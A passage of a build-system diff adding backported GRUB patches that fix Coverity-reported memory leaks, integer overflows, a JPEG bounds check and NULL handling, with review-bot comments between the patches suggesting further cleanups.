+Date: Tue, 1 Dec 2020 23:41:24 +0000
+Subject: [PATCH] commands/hashsum: Fix a memory leak
+
+check_list() uses grub_file_getline(), which allocates a buffer.
+If the hash list file contains invalid lines, the function leaks
+this buffer when it returns an error.
+
+Fixes: CID 176635
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b6f528e52e18b7a69f90b8dc3671d7b1147d9f3]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hashsum.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hashsum.c b/grub-core/commands/hashsum.c
+index 456ba90..b8a22b0 100644
+--- a/grub-core/commands/hashsum.c
++++ b/grub-core/commands/hashsum.c
+@@ -128,11 +128,17 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+ high = hextoval (*p++);
+ low = hextoval (*p++);
+ if (high < 0 || low < 0)
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ {
++ grub_free (buf);
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ }
+ expected[i] = (high << 4) | low;
+ }
+ if ((p[0] != ' ' && p[0] != '\t') || (p[1] != ' ' && p[1] != '\t'))
+- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ {
++ grub_free (buf);
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++ }
+ p += 2;
+ if (prefix)
+ {
+@@ -140,7 +146,10 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+
+ filename = grub_xasprintf ("%s/%s", prefix, p);
+ if (!filename)
+- return grub_errno;
++ {
++ grub_free (buf);
++ return grub_errno;
++ }
+ file = grub_file_open (filename, GRUB_FILE_TYPE_TO_HASH
+ | (!uncompress ? GRUB_FILE_TYPE_NO_DECOMPRESS
+ : GRUB_FILE_TYPE_NONE));
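Review bot: The same `grub_free (buf); return ...;` pair is now repeated on three error paths in check_list, and any error path added later will have to remember it too. A single cleanup label that frees `buf` (set `err`, then `goto fail`) would keep the release in one place. The function starts and ends outside the hunk, so it is not visible whether the hash list file opened earlier is released on these early returns; if it is not, the same cleanup label would be the place to close it.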
diff --git a/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
new file mode 100644
index 0000000000..7e4e951245
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
@@ -0,0 +1,94 @@
+From 2a1e5659763790201a342f8a897c8c9d8d91b1cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:14:31 +0000
+Subject: [PATCH] video/efi_gop: Remove unnecessary return value of
+ grub_video_gop_fill_mode_info()
+
+The return value of grub_video_gop_fill_mode_info() is never able to be
+anything other than GRUB_ERR_NONE. So, rather than continue to return
+a value and checking it each time, it is more correct to redefine the
+function to not return anything and remove checks of its return value
+altogether.
+
+Fixes: CID 96701
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fc5951d3b1616055ef81a019a5affc09d13344d0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/efi_gop.c | 25 ++++++-------------------
+ 1 file changed, 6 insertions(+), 19 deletions(-)
+
+diff --git a/grub-core/video/efi_gop.c b/grub-core/video/efi_gop.c
+index 7f9d1c2..db2ee98 100644
+--- a/grub-core/video/efi_gop.c
++++ b/grub-core/video/efi_gop.c
+@@ -227,7 +227,7 @@ grub_video_gop_fill_real_mode_info (unsigned mode,
+ return GRUB_ERR_NONE;
+ }
+
+-static grub_err_t
++static void
+ grub_video_gop_fill_mode_info (unsigned mode,
+ struct grub_efi_gop_mode_info *in,
+ struct grub_video_mode_info *out)
+@@ -252,8 +252,6 @@ grub_video_gop_fill_mode_info (unsigned mode,
+ out->blit_format = GRUB_VIDEO_BLIT_FORMAT_BGRA_8888;
+ out->mode_type |= (GRUB_VIDEO_MODE_TYPE_DOUBLE_BUFFERED
+ | GRUB_VIDEO_MODE_TYPE_UPDATING_SWAP);
+-
+- return GRUB_ERR_NONE;
+ }
+
+ static int
+@@ -266,7 +264,6 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+ grub_efi_uintn_t size;
+ grub_efi_status_t status;
+ struct grub_efi_gop_mode_info *info = NULL;
+- grub_err_t err;
+ struct grub_video_mode_info mode_info;
+
+ status = efi_call_4 (gop->query_mode, gop, mode, &size, &info);
+@@ -277,12 +274,7 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+ continue;
+ }
+
+- err = grub_video_gop_fill_mode_info (mode, info, &mode_info);
+- if (err)
+- {
+- grub_errno = GRUB_ERR_NONE;
+- continue;
+- }
++ grub_video_gop_fill_mode_info (mode, info, &mode_info);
+ if (hook (&mode_info, hook_arg))
+ return 1;
+ }
+@@ -466,13 +458,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+
+ info = gop->mode->info;
+
+- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+- &framebuffer.mode_info);
+- if (err)
+- {
+- grub_dprintf ("video", "GOP: couldn't fill mode info\n");
+- return err;
+- }
++ grub_video_gop_fill_mode_info (gop->mode->mode, info,
++ &framebuffer.mode_info);
+
+ framebuffer.ptr = (void *) (grub_addr_t) gop->mode->fb_base;
+ framebuffer.offscreen
+@@ -486,8 +473,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+ {
+ grub_dprintf ("video", "GOP: couldn't allocate shadow\n");
+ grub_errno = 0;
+- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+- &framebuffer.mode_info);
++ grub_video_gop_fill_mode_info (gop->mode->mode, info,
++ &framebuffer.mode_info);
+ buffer = framebuffer.ptr;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..8165ea3f71
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
@@ -0,0 +1,78 @@
+From 99ecf5a44b99d529a6405fe276bedcefa3657a0a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 15:10:51 +0000
+Subject: [PATCH] video/fb/fbfill: Fix potential integer overflow
+
+The multiplication of 2 unsigned 32-bit integers may overflow before
+promotion to unsigned 64-bit. We should ensure that the multiplication
+is done with overflow detection. Additionally, use grub_sub() for
+subtraction.
+
+Fixes: CID 73640, CID 73697, CID 73702, CID 73823
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7ce3259f67ac2cd93acb0ec0080c24b3b69e66c6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/fbfill.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/video/fb/fbfill.c b/grub-core/video/fb/fbfill.c
+index 11816d0..a37acd1 100644
+--- a/grub-core/video/fb/fbfill.c
++++ b/grub-core/video/fb/fbfill.c
+@@ -31,6 +31,7 @@
+ #include <grub/fbfill.h>
+ #include <grub/fbutil.h>
+ #include <grub/types.h>
++#include <grub/safemath.h>
+ #include <grub/video.h>
+
+ /* Generic filler that works for every supported mode. */
+@@ -61,7 +62,9 @@ grub_video_fbfill_direct32 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -98,7 +101,9 @@ grub_video_fbfill_direct24 (struct grub_video_fbblit_info *dst,
+ #endif
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -131,7 +136,9 @@ grub_video_fbfill_direct16 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = (dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width);
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -161,7 +168,9 @@ grub_video_fbfill_direct8 (struct grub_video_fbblit_info *dst,
+
+ /* Calculate the number of bytes to advance from the end of one line
+ to the beginning of the next line. */
+- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++ return;
+
+ /* Get the start address. */
+ dstptr = grub_video_fb_get_video_ptr (dst, x, y);
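Review bot: When `grub_mul ()` or `grub_sub ()` reports overflow, the four fill routines (direct32, direct24, direct16, direct8) return silently, and since they are `void` the caller cannot tell that nothing was drawn. A short comment at each site would record the intent, for example `/* Inconsistent pitch/width: skip the fill rather than write outside the target. */`, and a `grub_dprintf ()` would make the condition diagnosable. The overflow test is relative to the type of `rowskip`, whose declaration is outside the hunks, so it is worth confirming that type is unsigned and at least as wide as the pointer arithmetic that later uses it. The identical two-line check could also move into one `static` helper shared by the four functions.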
diff --git a/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
new file mode 100644
index 0000000000..544e7f31ae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
@@ -0,0 +1,104 @@
+From 69b91f7466a5ad5fb85039a5b4118efb77ad6347 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 14:43:44 +0000
+Subject: [PATCH] video/fb/video_fb: Fix multiple integer overflows
+
+The calculation of the unsigned 64-bit value is being generated by
+multiplying 2, signed or unsigned, 32-bit integers which may overflow
+before promotion to unsigned 64-bit. Fix all of them.
+
+Fixes: CID 73703, CID 73767, CID 73833
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08e098b1dbf01e96376f594b337491bc4cfa48dd]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 52 ++++++++++++++++++++++++-----------
+ 1 file changed, 36 insertions(+), 16 deletions(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1a602c8..1c9a138 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -25,6 +25,7 @@
+ #include <grub/fbutil.h>
+ #include <grub/bitmap.h>
+ #include <grub/dl.h>
++#include <grub/safemath.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -1417,15 +1418,23 @@ doublebuf_blit_update_screen (void)
+ {
+ if (framebuffer.current_dirty.first_line
+ <= framebuffer.current_dirty.last_line)
+- grub_memcpy ((char *) framebuffer.pages[0]
+- + framebuffer.current_dirty.first_line
+- * framebuffer.back_target->mode_info.pitch,
+- (char *) framebuffer.back_target->data
+- + framebuffer.current_dirty.first_line
+- * framebuffer.back_target->mode_info.pitch,
+- framebuffer.back_target->mode_info.pitch
+- * (framebuffer.current_dirty.last_line
+- - framebuffer.current_dirty.first_line));
++ {
++ grub_size_t copy_size;
++
++ if (grub_sub (framebuffer.current_dirty.last_line,
++ framebuffer.current_dirty.first_line, &copy_size) ||
++ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
++
++ grub_memcpy ((char *) framebuffer.pages[0] + framebuffer.current_dirty.first_line *
++ framebuffer.back_target->mode_info.pitch,
++ (char *) framebuffer.back_target->data + framebuffer.current_dirty.first_line *
++ framebuffer.back_target->mode_info.pitch,
++ copy_size);
++ }
+ framebuffer.current_dirty.first_line
+ = framebuffer.back_target->mode_info.height;
+ framebuffer.current_dirty.last_line = 0;
+@@ -1439,7 +1448,7 @@ grub_video_fb_doublebuf_blit_init (struct grub_video_fbrender_target **back,
+ volatile void *framebuf)
+ {
+ grub_err_t err;
+- grub_size_t page_size = mode_info.pitch * mode_info.height;
++ grub_size_t page_size = (grub_size_t) mode_info.pitch * mode_info.height;
+
+ framebuffer.offscreen_buffer = grub_zalloc (page_size);
+ if (! framebuffer.offscreen_buffer)
+@@ -1482,12 +1491,23 @@ doublebuf_pageflipping_update_screen (void)
+ last_line = framebuffer.previous_dirty.last_line;
+
+ if (first_line <= last_line)
+- grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page]
+- + first_line * framebuffer.back_target->mode_info.pitch,
+- (char *) framebuffer.back_target->data
+- + first_line * framebuffer.back_target->mode_info.pitch,
+- framebuffer.back_target->mode_info.pitch
+- * (last_line - first_line));
++ {
++ grub_size_t copy_size;
++
++ if (grub_sub (last_line, first_line, &copy_size) ||
++ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
++
++ grub_memcpy ((char *) framebuffer.pages[framebuffer.render_page] + first_line *
++ framebuffer.back_target->mode_info.pitch,
++ (char *) framebuffer.back_target->data + first_line *
++ framebuffer.back_target->mode_info.pitch,
++ copy_size);
++ }
++
+ framebuffer.previous_dirty = framebuffer.current_dirty;
+ framebuffer.current_dirty.first_line
+ = framebuffer.back_target->mode_info.height;
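Review bot: Only the length passed to `grub_memcpy ()` is overflow-checked in doublebuf_blit_update_screen and doublebuf_pageflipping_update_screen; the source and destination offsets are still computed as a plain `first_line * ...mode_info.pitch` in the operands' own type. If that product can wrap, both pointers land at the wrong place even though `copy_size` is valid, so the offset should go through `grub_mul ()` once and be reused for both arguments, as sketched below for the first function. In grub_video_fb_doublebuf_blit_init, `(grub_size_t) mode_info.pitch * mode_info.height` only widens where `grub_size_t` is wider than the operands, so `grub_mul ()` would be the consistent choice there as well. Both update functions continue outside the hunks.

```c
      grub_size_t copy_size, line_off;

      if (grub_sub (framebuffer.current_dirty.last_line,
                    framebuffer.current_dirty.first_line, &copy_size) ||
          grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size) ||
          grub_mul (framebuffer.back_target->mode_info.pitch,
                    framebuffer.current_dirty.first_line, &line_off))
        {
          /* … unchanged: return GRUB_ERR_BUG … */
        }

      grub_memcpy ((char *) framebuffer.pages[0] + line_off,
                   (char *) framebuffer.back_target->data + line_off,
                   copy_size);
```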
diff --git a/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
new file mode 100644
index 0000000000..c82b2c7df0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch
@@ -0,0 +1,39 @@
+From aac5574ff340a665ccc78d4c3d61596ac67acbbe Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 14:51:30 +0000
+Subject: [PATCH] video/fb/video_fb: Fix possible integer overflow
+
+It is minimal possibility that the values being used here will overflow.
+So, change the code to use the safemath function grub_mul() to ensure
+that doesn't happen.
+
+Fixes: CID 73761
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08413f2f4edec0e2d9bf15f836f6ee5ca2e379cb]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/video_fb.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
+index 1c9a138..ae6b89f 100644
+--- a/grub-core/video/fb/video_fb.c
++++ b/grub-core/video/fb/video_fb.c
+@@ -1537,7 +1537,13 @@ doublebuf_pageflipping_init (struct grub_video_mode_info *mode_info,
+ volatile void *page1_ptr)
+ {
+ grub_err_t err;
+- grub_size_t page_size = mode_info->pitch * mode_info->height;
++ grub_size_t page_size = 0;
++
++ if (grub_mul (mode_info->pitch, mode_info->height, &page_size))
++ {
++ /* Shouldn't happen, but if it does we've a bug. */
++ return GRUB_ERR_BUG;
++ }
+
+ framebuffer.offscreen_buffer = grub_malloc (page_size);
+ if (! framebuffer.offscreen_buffer)
diff --git a/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
new file mode 100644
index 0000000000..3fca2aecb5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch
@@ -0,0 +1,38 @@
+From 88361a7fd4e481a76e1159a63c9014fa997ef29c Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 15:39:00 +0000
+Subject: [PATCH] video/readers/jpeg: Test for an invalid next marker reference
+ from a jpeg file
+
+While it may never happen, and potentially could be caught at the end of
+the function, it is worth checking up front for a bad reference to the
+next marker just in case of a maliciously crafted file being provided.
+
+Fixes: CID 73694
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5f5eb7ca8e971227e95745abe541df3e1509360e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/readers/jpeg.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..0b6ce3c 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -253,6 +253,12 @@ grub_jpeg_decode_quan_table (struct grub_jpeg_data *data)
+ next_marker = data->file->offset;
+ next_marker += grub_jpeg_get_word (data);
+
++ if (next_marker > data->file->size)
++ {
++ /* Should never be set beyond the size of the file. */
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "jpeg: invalid next reference");
++ }
++
+ while (data->file->offset + sizeof (data->quan_table[id]) + 1
+ <= next_marker)
+ {
diff --git a/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
new file mode 100644
index 0000000000..61e5e5797d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch
@@ -0,0 +1,34 @@
+From 9433cb3a37c03f22c2fa769121f1f509fd031ae9 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Mon, 7 Dec 2020 14:44:47 +0000
+Subject: [PATCH] gfxmenu/gui_list: Remove code that coverity is flagging as
+ dead
+
+The test of value for NULL before calling grub_strdup() is not required,
+since the if condition prior to this has already tested for value being
+NULL and cannot reach this code if it is.
+
+Fixes: CID 73659
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4a1aa5917595650efbd46b581368c470ebee42ab]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gfxmenu/gui_list.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/gfxmenu/gui_list.c b/grub-core/gfxmenu/gui_list.c
+index 01477cd..df334a6 100644
+--- a/grub-core/gfxmenu/gui_list.c
++++ b/grub-core/gfxmenu/gui_list.c
+@@ -771,7 +771,7 @@ list_set_property (void *vself, const char *name, const char *value)
+ {
+ self->need_to_recreate_boxes = 1;
+ grub_free (self->selected_item_box_pattern);
+- self->selected_item_box_pattern = value ? grub_strdup (value) : 0;
++ self->selected_item_box_pattern = grub_strdup (value);
+ self->selected_item_box_pattern_inherit = 0;
+ }
+ }
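Review bot: The result of `grub_strdup (value)` in list_set_property is stored in `self->selected_item_box_pattern` without a NULL check, so an allocation failure is indistinguishable from "no pattern set". With the ternary removed, the only thing keeping a NULL `value` out of this call is the test the commit message refers to, and that test lies above the hunk and cannot be confirmed from here. I would record the dependency next to the call, `/* value is non-NULL here: rejected by the check at the top of this branch. */`, so a later reshuffle of the conditions does not reintroduce the dereference. If the function can report errors, returning `grub_errno` when the duplicate comes back NULL would also be worth adding.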
diff --git a/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
new file mode 100644
index 0000000000..34643e10ab
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch
@@ -0,0 +1,47 @@
+From 7899384c8fdf9ed96566978c49b0c6e40e70703d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:47:13 +0000
+Subject: [PATCH] loader/bsd: Check for NULL arg up-front
+
+The code in the next block suggests that it is possible for .set to be
+true but .arg may still be NULL.
+
+This code assumes that it is never NULL, yet later is testing if it is
+NULL - that is inconsistent.
+
+So we should check first if .arg is not NULL, and remove this check that
+is being flagged by Coverity since it is no longer required.
+
+Fixes: CID 292471
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5d5391b0a05abe76e04c1eb68dcc6cbef5326c4a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/i386/bsd.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/loader/i386/bsd.c b/grub-core/loader/i386/bsd.c
+index b92cbe9..8432283 100644
+--- a/grub-core/loader/i386/bsd.c
++++ b/grub-core/loader/i386/bsd.c
+@@ -1605,7 +1605,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+ kernel_type = KERNEL_TYPE_OPENBSD;
+ bootflags = grub_bsd_parse_flags (ctxt->state, openbsd_flags);
+
+- if (ctxt->state[OPENBSD_ROOT_ARG].set)
++ if (ctxt->state[OPENBSD_ROOT_ARG].set && ctxt->state[OPENBSD_ROOT_ARG].arg != NULL)
+ {
+ const char *arg = ctxt->state[OPENBSD_ROOT_ARG].arg;
+ unsigned type, unit, part;
+@@ -1622,7 +1622,7 @@ grub_cmd_openbsd (grub_extcmd_context_t ctxt, int argc, char *argv[])
+ "unknown disk type name");
+
+ unit = grub_strtoul (arg, (char **) &arg, 10);
+- if (! (arg && *arg >= 'a' && *arg <= 'z'))
++ if (! (*arg >= 'a' && *arg <= 'z'))
+ return grub_error (GRUB_ERR_BAD_ARGUMENT,
+ "only device specifications of form "
+ "<type><number><lowercase letter> are supported");
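Review bot: When `.set` is true but `.arg` is NULL, the widened condition in grub_cmd_openbsd now skips the whole root-device block without reporting anything, so the boot proceeds as if the option had not been given. An explicit rejection ahead of the block would be easier to diagnose, for example `if (ctxt->state[OPENBSD_ROOT_ARG].set && ctxt->state[OPENBSD_ROOT_ARG].arg == NULL) return grub_error (GRUB_ERR_BAD_ARGUMENT, "missing root device argument");`. The second hunk drops the `arg &&` test after `grub_strtoul (arg, (char **) &arg, 10)`, which is only safe if that call never stores NULL through its end pointer. That is presumably the case but not shown here, so a one-line comment stating it would help. The function body starts and ends outside both hunks.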
diff --git a/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
new file mode 100644
index 0000000000..41f09a22fc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch
@@ -0,0 +1,38 @@
+From 0a4aa7c16f65cdfaa1013f0796afa929f8d6dc1a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:53:10 +0000
+Subject: [PATCH] loader/xnu: Fix memory leak
+
+The code here is finished with the memory stored in name, but it only
+frees it if there curvalue is valid, while it could actually free it
+regardless.
+
+The fix is a simple relocation of the grub_free() to before the test
+of curvalue.
+
+Fixes: CID 96646
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bcb59ece3263d118510c4440c4da0950f224bb7f]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 07232d2..b3029a8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1388,9 +1388,9 @@ grub_xnu_fill_devicetree (void)
+ name[len] = 0;
+
+ curvalue = grub_xnu_create_value (curkey, name);
++ grub_free (name);
+ if (!curvalue)
+ return grub_errno;
+- grub_free (name);
+
+ data = grub_malloc (grub_strlen (var->value) + 1);
+ if (!data)
diff --git a/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
new file mode 100644
index 0000000000..f9ad0fc34c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch
@@ -0,0 +1,77 @@
+From 81117a77a9e945ee5e7c1f12bd5667e2a16cbe32 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 30 Nov 2020 12:18:24 -0300
+Subject: [PATCH] loader/xnu: Free driverkey data when an error is detected in
+ grub_xnu_writetree_toheap()
+
+... to avoid memory leaks.
+
+Fixes: CID 96640
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=4b4027b6b1c877d7ab467896b04c7bd1aadcfa15]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 24 ++++++++++++++++++++----
+ 1 file changed, 20 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index b3029a8..39ceff8 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -224,26 +224,33 @@ grub_xnu_writetree_toheap (grub_addr_t *target, grub_size_t *size)
+ if (! memorymap)
+ return grub_errno;
+
+- driverkey = (struct grub_xnu_devtree_key *) grub_malloc (sizeof (*driverkey));
++ driverkey = (struct grub_xnu_devtree_key *) grub_zalloc (sizeof (*driverkey));
+ if (! driverkey)
+ return grub_errno;
+ driverkey->name = grub_strdup ("DeviceTree");
+ if (! driverkey->name)
+- return grub_errno;
++ {
++ err = grub_errno;
++ goto fail;
++ }
++
+ driverkey->datasize = sizeof (*extdesc);
+ driverkey->next = memorymap->first_child;
+ memorymap->first_child = driverkey;
+ driverkey->data = extdesc
+ = (struct grub_xnu_extdesc *) grub_malloc (sizeof (*extdesc));
+ if (! driverkey->data)
+- return grub_errno;
++ {
++ err = grub_errno;
++ goto fail;
++ }
+
+ /* Allocate the space based on the size with dummy value. */
